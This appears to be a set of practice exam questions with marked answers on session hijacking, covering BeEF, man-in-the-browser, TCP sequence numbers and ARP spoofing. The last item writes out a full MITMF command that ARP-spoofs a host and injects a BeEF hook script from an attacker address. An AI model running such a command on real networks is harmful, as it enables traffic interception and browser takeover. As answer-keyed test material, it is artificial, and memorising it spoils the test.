During the penetration test, Marin is using the MITMF tool to inject the arbitrary data into an HTTP communication channel between the clients on the internal network and web servers in order to steal the cookies and, if possible, establish a remote shell on the victim’s computer.

He successfully injects XSS JavaScript into the session, and with BeeF he has a control over the user browser, as shown in the following images.

Command used with the MITMF tool:

There is no 0-day vulnerability against the client browser (at least not the one Marin knows about).

Is it possible to gain the remote shell access to the remote machine without
browser/javascript/flash etc. vulnerability?


      No. Marin needs 0 day in order to escalate to remote shell

      TRUE :
      Yes. Marin can try to use social engineering attacks (like “Fake Flash Update”), and try to fool the user into clicking on the malicious payload

      No. This is impossible to be done over XSS and BeeF

      Yes. There is an exploit in BeeF that always works; afterall Marin has access to the remote browser


Explanation:
The correct answer is
    “Yes. Marin can try to use social engineering attacks (like “Fake Flash Update”), and try to fool the user into clicking on the malicious payload”.

    If the user is naïve enough, Marin can always make him click on malicious payload with social engineering payloads in BeeF.
    There is no magical exploit that always works even if there is no 0-day.

------------------------------------

MitB (Man in the Browser) is a session hijacking technique heavily used by e-banking Trojans. The most popular ones are Zeus and Gameover Zeus. Explain how MitB attack works.


          Malware is injected between the browser and network.dll, enabling to see the data before it is sent to the network and while it is being received from the network.

          TRUE  : Malware is injected between the browser and OS API, enabling to see the data before    encryption (when data is sent from the machine) and after decryption (when data is being received by the machine).

          Malware is injected between the browser and keyboard driver, enabling to see all the keystrokes.

          Man-in-the-Browser is just another name for sslstrip MitM attack.

          Explanation:
          On Windows OS, malware is injected between the browser and wininet.dll, which allows it to see the data before encryption (wininet.dll is exposing APIs to use https etc.)

-------------------------------------

In order to hijack TCP traffic, an attacker has to understand the next sequence and the acknowledge number that the remote computer expects. Explain how the sequence and acknowledgment numbers are incremented during the 3-way handshake process.



        TRUE :
        Sequence and acknowledgment numbers are incremented by one during the 3-way handshake process

        Sequence number is not incremented and acknowledgment number is incremented by one during the 3-way handshake process

        Sequence and acknowledgment numbers are incremented by two during the 3-way handshake process

        Sequence number is incremented by one and acknowledge number is not incremented during the 3-way handshake process

        Explanation:
        During the 3-way handshake, sequence and acknowledgment numbers are (relatively) incremented by one. After that acknowledge number will be incremented for the size of the packet received.

----------------------------------------

Which of the following is considered to be a session hijacking attack?


Taking over a TCP session : TRUE

Monitoring a TCP session

Monitoring a UDP session

Taking over a UDP session


---------------------------------

When a person (or software) steals, can calculate, or can guess part of the communication channel between client and the server application or protocols used in the communication, he can hijack the ______.


TCP protocol

UDP protocol

Session : TRUE

Channel

----------------------------------

An attacker is using session hijacking on the victim system to perform further exploitation on the target network. Identify the type of attacks an attacker can perform using session hijacking?


Sniffing  : TRUE

Dumpster Diving

Tailgating

Piggybacking


--------------------------------

During a penetration test, Marin identified a web application that could be exploited to gain a root shell on the remote machine.

The only problem was that in order to do that he would have to know at least one valid username and password that could be used in the application. Unfortunately, guessing usernames and brute-forcing passwords did not work.

Marin does not want to give up his attempts.
Since this web application is being used by almost all users in the company, and moreover it was using the http protocol, so he decided to use the Cain&Abel tool in order to identify at least one username and password.

Morin found that the network was using layer 2 switches with no configuration or management features.
What could be the easiest way to start an attack in this case?




        ARP spoofing

        MitB (Man in the Browser)

        MitM (Man in the Middle) : TRUE

        DNS spoofing


---------------------------------------

During the penetration testing, Marin identified a web application that could be exploited to gain the root shell on the remote machine. The only problem was that in order to do that he would have to know at least one username and password usable in the application. Unfortunately, guessing usernames and brute-forcing passwords did not work. Marin does not want to give up his attempts. Since this web application,was being used by almost all users in the company and was using http protocol, so he decided to use Cain & Abel tool in order to identify at least one username and password.

After a few minutes, the first username and password popped-up and he successfully exploited the web application and the physical machine.

 What type of attack did he use in order to find the username and password to access the web application?



            DNS spoofing

            ARP spoofing : TRUE

            TCP protocol hijacking

            UDP protocol hijacking

Explanation:

ARP spoofing is the correct answer, and

    since there are no configuration or management options on switches
          => it means that there is no ARP spoofing protection.

 DNS spoofing is more complex and it is never the first option.

 TCP and UDP protocol hijacking does not make any sense here – after ARP spoofing all the traffic will be hijacked.

--------------------------------

During a penetration test, Marin exploited a blind SQLi and exfiltrated session tokens from the database. What can he do with this data?




      Marin can do XSS (Cross-Site Scripting)

      Marin can do Session hijacking : TRUE

      Marin can do SQLi (SQL injection)

      Marin can do CSRF (Cross-Site Request Forgery)

-----------------------------


During the penetration test, Marin is using the MITMF tool to inject the arbitrary data into an HTTP communication channel between the clients on the internal network and web servers in order to steal the cookies and, if possible, establish a remote shell on the victim’s computer.

He successfully injects XSS JavaScript into the session, and with BeeF he has a control over the user browser, as shown in the following images.

Command used with the MITMF tool:

mitmf -i eth0 --spoof --arp --gateway 192.168.132.2 --targets 192.168.132.196 --inject
--js-payload  "</script><script src="http://192.168.132.120:3000/hook.js></script>"



There is no 0-day vulnerability against the client browser (at least not the one Marin knows about). Is it possible to gain the remote shell access to the remote machine without browser/javascript/flash etc. vulnerability?



              No. Marin needs 0 day in order to escalate to remote shell

              Yes. There is an exploit in BeeF that always works;
                    afterall Marin has access to the remote browser

              Yes. Marin can try to use social engineering attacks (like “Fake Flash Update”), and try to fool the user into clicking on the malicious payload : TRUE

              No. This is impossible to be done over XSS and BeeF


-----------------------------
